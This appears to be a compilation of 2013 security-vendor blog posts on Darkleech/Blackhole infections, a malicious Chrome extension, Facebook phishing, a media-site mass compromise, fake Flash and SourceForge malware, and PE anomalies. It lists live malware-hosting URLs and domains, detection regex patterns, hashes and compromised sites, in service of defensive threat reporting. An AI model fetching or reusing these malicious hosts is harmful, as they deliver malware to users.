Darkleech attack continues to grow

The Apache Darkleech attack has been in the news for quite some time now. The first compromise that we identified in our transactions dates back to mid-March. This Darkleech exploit (aka Linux.Cdorked)  injects malicious redirections into a website that leads to a Blackhole exploit kit (BEK) landing page. Sucuri published up a great write up about the Darkleech infection mechanism on the server side.

We are currently observing a considerable rise in websites being compromised due to this attack. The infected websites redirect to a version of the Blackhole Exploit Kit v2. We identified the following sites being compromised in the past week within observed Zscaler traffic:

202.218.253.214
bazzillbasics.com
bigfishermanseafood.com
clasificados.zocalo.com.mx
colima.vendidoalas3.com.mx
embarque.com
kimindschool.com
mapas.guiaroji.com.mx
mediagazer.com
middleschoolbook.com
mpsrail.co.uk
new.schoolnotes.com
newsofthepast.com
norwalkmedicalgroup.com
reports.valeopartners.com
studioartsdallas.com
unit2.euro2day.gr
v2.wallpaperzip.com
www.264thegrill.com
www.acadianabusiness.com
www.alancristea.com
www.aqua-medic.com
www.aquapurawater.ca
www.backroads.org
www.beachcamsusa.com
www.bsgco.com
www.chicagohomeestates.com
www.compactpowercenter.com
www.companyrescue.co.uk
www.eastpak.com
www.euro2day.gr
www.flowersandservices.com
www.fortworthzoocoupons.net
www.freedieting.com
www.gite-mer.com
www.grandlifehotels.com
www.jackshainman.com
www.momentumtraining.biz
www.nevadasecuritylicense.com
www.qualityenvironmental.co.uk
www.ranabroadband.net
www.rentalsource.com
www.servo2go.com
www.superiorvalves.com
www.theacme.com
www.trulia.com
www.vbbound.com
www.visit-montenegro.com
www.volpifoods.com

The following list shows the list of IPs and websites observed serving the Blackhole Exploit kit landing page.

129.121.101.227
129.121.104.90
129.121.108.220
129.121.113.217
129.121.120.211
129.121.168.226
129.121.194.244
129.121.199.90
129.121.201.230
129.121.45.181
129.121.55.185
129.121.61.189
129.121.65.124
129.121.85.166
143.95.13.5
143.95.1.6
143.95.17.5
143.95.1.8
143.95.2.6
143.95.7.6
149.47.113.128
149.47.149.225
149.47.154.201
149.47.205.179
149.47.21.162
149.47.218.128
149.47.22.176
149.47.225.171
149.47.245.128
173.233.133.30
173.233.133.43
173.233.134.138
173.244.221.89
174.37.210.122
174.37.210.127
208.166.50.27
208.43.236.169
208.69.183.138
208.69.183.205
209.126.248.63
216.154.208.125
64.247.176.220
64.247.180.106
65.75.145.203
65.75.168.252
65.75.174.197
65.75.176.120
65.75.184.70
65.75.185.243
65.75.188.211
65.75.190.59
67.213.213.23
69.89.4.92
69.89.5.224
69.89.9.47
adanakenthaber.com
aftabcurrency.eu
akmusik.org
alzagh.com
aminexchange.net
austriawanderer.com
basquet-atletico.lendanearlongisland.com
boomchoon.co.uk
budgettyremaintenance.co.uk
cariparker.co.uk
cinselmarket.org
countryandleisureclothing.co.uk
egyptwanderer.com
elkadytrans.com
firstbytemicro.com
foryouroccasions.co.uk
georgemediahouse.co.uk
gheep.co.uk
gshcontracts.co.uk
hcxmy.com
hungarywanderer.com
lcwceramics.co.uk
leventerkekkuaforu.com
lovehost.co.uk
moneystopltd.co.uk
mpsrail.co.uk
mtlssc.org.uk
ondervreemdevlag.nl
partitioningsoutheast.co.uk
platjadarovirtual.com
rika.100pixels.co.uk
sms.nozom.com.eg
teddyrepair.co.uk
upminstercontainers.com
wallpapers.animalz.gr
wcwr.co.uk

The following pattern in the URL was observed:

\/[a-z0-9]{16,32}\/q.php

We also identified the following user-agent strings when the redirection was made:

Java/1.6.0_26
JNLP/1.7.0 javaws/10.21.2.11 () Java/1.7.0_21
JNLP/6.0 javaws/1.6.0_03 (b05) Java/1.6.0_03
JNLP/6.0 javaws/1.6.0_26 (b03) Java/1.6.0_26

The user agents found while visiting these infected sites were mainly: MSIE_7_X, MSIE_8_X and MSIE_9_X.

Upon visiting an infected website, it redirects to a standard BEK v2 landing page as shown below.

The exploit code targets vulnerabilities in multiple plugins including Adobe PDF and Java when run on IE, causing the attacker to load malicious code in the context of the application. When deobfuscating the PDF exploit, we can see the final URL used for redirection, as shown in the image below. However, this URL was not accessible (404 error response), at the time of writing, hence it was not possible to retrieve the malicious binary file.

Upon revisiting some of these compromised websites, it was found that the page was no longer serving the injected code. This provides a clue. The attackers probably choose random sites running the Apache Webservers that are vulnerable to the dark leech exploit and infect them only for a brief period of time and then clean them up. Hence tracking Darkleech infections is can be a challenging task. For further details on the vulnerability and how the server can be patched, please refer to CVE-2012-1557.

Fake YouTube page targets Chrome users

Fake YouTube pages are one of the favored ways attackers leverage to get users to click on malicious content. These fake pages often look the same, but the source code can reveal a new twist. This time, a recently encountered fake YouTube page host at http://facebook-java.com targets Google Chrome users only.

Fake YouTube page

We have found a many malicious sites that specifically target Internet Explorer or Firefox users, but not often Google Chrome users. In this example, any click on the fake video player or the fake ad attempts to install the following extension for Google Chrome: https://chrome.google.com/webstore/detail/nhmibhinlbilhaflldckbeokphjoifhi.

JavaScrip code that installs a Chrome extension

You may have noticed that the extension is hosted in the official Google Chrome store. Google disabled the installation of extensions for 3rd party sites in June 2012, and silent installs in late 2012.

The Chrome store page does not show any information about the extension:

Let's install the extension hosted at http://facebook-java.com/.

List of permissions requested by the extension

A new icon is added next to the URL bar:

The link redirects to http://www.getjava.net/. This shows the same page as facebook-java.com. It tries to install another extension from the Chrome store, but this one has already been removed.

getjava.net

Now that the extension has been installed, it is not possible to open Tools or Settings in Chrome. Instead, a tab opens to https://www.facebook.com/?get_cod whenever those functions are accessed. The corresponding code in the malicious extension shows how it is done:

Overrides any tab wit ha URL starting with chrome://

Thereafter, in every webpage viewed four different malicious scripts are inserted. The author uses the Google URL shortener to include the malicious JavaScript:

• http://goo.gl/9Ky9t => http://profonixcoder.com/yeni/pro.php
• http://goo.gl/gQhF6 => http://profonixcoder.com/yeni/twitter.php (down)
• http://goo.gl/t7snI => http://profonixcoder.com/yeni/youtube.php (down)
• http://goo.gl/jUEgY => http://profonixcoder.com/yeni/askfm.php (down)

Only the first script is available currently. It works on Facebook pages. It shares links using the user's account. By the name of the other files, we can assume they do something similar on YouTube, Twitter and Ask.fm

It looks like the author of this malicious extension doesn't have a high opinion of Google's security by using Google for hosting the extension and using their URL shortener to inject the malicious JavaScript.

Facebook Scam for Stalkers

If you are like me, you might feel bad about leaving your dog home alone all day while you are at work.  So to alleviate his boredom, I've let him sign up for his own Facebook.  Being new to the social media scene has already resulted in one tragedy. Well, my dog has done it again.  This time he was paranoid over whether his girlfriend from across the street was cheating on him.  So of course when he sees the new FBStalker26.com, he must try it.

On Version 26! So Advanced. So Legit.

Being a human, I know that this is obviously a phishing attempt trying to trick my dog into revealing his username and password to Facebook or worse.  Usually a Facebook scam's success is determined by the paranoia of who is looking at your profile or how many free iPads you can win.  Once you realize that, these phish attempts are almost elementary to recognize.

Always look at the address bar before entering your creds.

 The link from that photo will take you immediately to a new page where you are meant to log in again with your Facebook credentials.  A quick glance at the address bar will show you that you are not in Kansas anymore.  Don't do it!  Don't enter that information!

Oh no you did it...Now your username/password have been compromised, they still won't have an easy time into your account due to higher security policies from Facebook.  Unfortunately, my dog was gullible enough to enter in his security question and answer, only to be disappointed by a 404 error immediately after that entering his data.  Looks like he'll never know who is stalking him now, but don't worry...he won't have access to his own Facebook account for much longer.

Popular Media Sites Involved in Mass Compromise

Update (May 9): OSIRT had the opportunity to review the infected web app code for one of the compromised sites and has a great write-up to explain what was happening from a server-side vantage point.

Today, Zscaler identified yet another mass website compromise, this one impacting a number of popular media sites, including two radio stations in Washington, DC - Federal News Radio and WTOP. It's not clear if all of the sites impacted were leveraging a common backend platform that may have led to the compromise.

Sadly, mass compromises are now the norm. Attacks targeting end users generally involve some form of social engineering whereby the potential victim must be convinced to visit a site, download a file, etc. Attackers will therefore write a script designed to comb the web looking for popular sites exposing a common flaw and when identified, inject a single line of malicious code into the sites. In that way, any user visiting the otherwise legitimate (but now infected) site, can become a victim. This particular threat also displays another common trait - being dynamic in nature and only delivering content if the victim browser exhibits certain attributes. In this case, the injected content is only displayed when the browser's User Agent string reveals that Internet Explorer (IE) is being used.  When IE is used to view one of the infected pages, the following code is sent to the browser:

Ofuscated JavaScript injected into a webpage at WTOP.com

Deobfuscated version of the injected code

This obfuscated JavaScript decodes to reveal an iFrame pointing to sites hosted at Dynamic DNS (DynDNS) hosting providers. Thus far, we have identified two DynDNS providers (myftp.biz and hopto.org) involved and the actual URLs (which are numerous), conform to the following pattern:

   \/[a-z0-9]{14,15}\/[a-z0-9]{32}\/

Example URL

Once redirected to the malicious URLs, Fake AntiVirus scams and the ZeroAccess Trojan are delivered to the victim. MD5s for malware delivered include the following:

2e1997982c4dde48a995df5061f1438f
2b150bd07bb74426d676d8cb47451fd0
62547040ac637b63c2d531e17438597a
8858050e303cca778e5083ed4e442763
eee9941e4d01b65061f4fb621b2d708d
b43c1d19d35e3606a7b6227cef561986

Thus far, Zscaler has identified the following compromised sites:

Media Sites

WTOP Radio (Washington, DC) - wtop.com
Federal News Radio (Washington, DC) - federalnewsradio.com
The Christian Post - christianpost.com
Real Clear Science - realclearscience.com
Real Clear Policy - realclearpolicy.com

Others

scubaboard.com
mrsec.com
menupix.com
xaxor.com
gvovideo.com

At the time of posting, these compromised sites were still offering up malicious content.

Fake Flash player on DropBox

Fake Flash updates are leveraged as a very popular trick amongst attackers to fool users into downloading and installing malware. This week we found a three websites distributing Win32.Sanity.N malware disguised as Flash updates:

• hxxp://kivancoldu.com/, redirects to hxxp://click-videox.com/

http://kivancoldu.com on 05/02/2013

• hxxp://fastcekim.com/, redirects to hxxp://click-videox.com/
• hxxp://kivanctatlitug.tk/ d(down)

hxxp://kivanctatlitug.tk/

The fake warning at the top of the page alternates between English and Turkish.

What is interesting is that the malicious executables are actually hosted in a DropBox account and have not been taken down since they were found about seven days ago. I have spotted two different executables so far:

• FlashPlayer.sfx.exe (detected by only 2 of 46 AV vendors)
• Videonuizle.exe (detected by 5 of 46 AV vendors)

These two files have similar behavior. They disable all Windows features: UAC, Firewall, AV, Safe Boot, etc. The malware then drops variants of the Sality virus, some of which have a good detection rate amongst AV vendors.

Interestingly, there is a link on the malicious websites that shows how many people visited it. There were 1,412 unique visitors in a single day.

There is another peak of traffic report and on 05/02 registered 1,700 visitors...and counting.

These sites keep popping up and the are still able to fool users.

More Fake SourceForge Websites Show Up

Two weeks ago we reported on a fake SourceForge website, sourceforgechile.net, which was used to distribute malware. We have since seen more of these fake sites this past week:

• sourceforgebulgaria.net, registered on 05/06/2013
• sourceforgesweden.net, registered on 05/06/2013
• sourceforgecyprus.net, registered on 05/02/2013
• sourceforgeniger.net, registered on 05/01/2013
  
• sourceforgeestonia.net, registered on 04/26/2013
• sourceforgegrenada.net, registered on 04/26/2013
• sourceforgepalau.net, registered on 04/22/2013
• sourceforgeecuador.net, registered on 04/21/2013
• sourceforgeindiana.net, registered on 04/20/2013
• sourceforgemorocco.net,  registered on 04/19/2013
• sourceforgemyanmar.net ,  registered on 04/19/2013
• sourceforgeyemen.net, registered on 04/06/2013

Each domain has been registered with different WHOIS information, but with the same registrar. All of them are unreachable today (DNS does not resolve).

We were however able to obtain two malicious files found from the these websites before they went dark:

• http://sourceforgeestonia.net/minecraft_xray_texture_pack.exe
• http://sourceforgeecuador.net/airport_firefighter_simulator.exe

The files are very similar to the malicious files from sourceforgechile.net which we analyzed earlier. They drop and hide malicious binaries into the Recycle Bin and are detected as the ZeroAccess Trojan.

It looks like the attacker is still registering new fake SourceForge websites. I'll update this post with new domain that I uncover going forward.

scanning binaries for PE format anomalies

After processing tons of malicous binaries, I would like to share my findings about anomalies found in PE binaries. These anomaly information will be helpful for security researchers on suspicious sample validation and sample clustering.


1. Binary strings nearby EP

Of course, EP binary is very popular for AV companies to work out malware signatures. So I put it at first. 81ec8001000053555633db57895c2418c74424103091400033 is most frequent EP string used by malware, which stands for stack operations. The second one is 60e803000000e9eb045d4555c3e801000000eb5dbbedffffff





This finding is pretty much similar with another research work from http://www.hexacorn.com/blog/2012/07/04/random-stats-from-300k-malicious-samples-entry-points/
 That article listed top-10 EP strings as the followings:

  35498 55 8B EC 6A FF 68
  22712 55 8B EC 83 C4 F0
  14775 55 8B EC 53 8B 5D
   7711 4D 5A 90 00 03 00
   6959 55 8B EC 83 C4 C4
   5775 4D 5A 50 00 02 00
   3497 55 8B EC 83 C4 F4
   3190 60 E8 00 00 00 00
   3080 83 7C 24 08 01 75
   2152 55 8B EC 83 C4 B4

2. Section names

I concatenated each section name into a string. Here is the top ones.

 
UPX is still the favorite packer for malware wirters, followed by UPack.


The above figure shows the values of section number in DESC order.  Most malicious samples have 3 sections.

I also picked some funny section names in Chinese:
天使免杀
天外来客
黑教基地
荒山一鱼
BY 小广
放荡不羁挖出
木马彩衣
牧民战天
傻傻
狂少爷 

Here is the longest one:

国庆专版祖国大寿祖国繁荣人民安康祝福大家身体健康工作顺利合家欢乐心想事成万事如意笑脸敬上.

Google translate results:

National Day special edition birthday of the motherland motherland's prosperity and people's well being I wish you all good health and success in your work all wishes come true and good luck. And a big smile!

3. anomaly score

I defined about 10 anomaly features which were used to calculate the total anomaly score.
The following is the score distribution.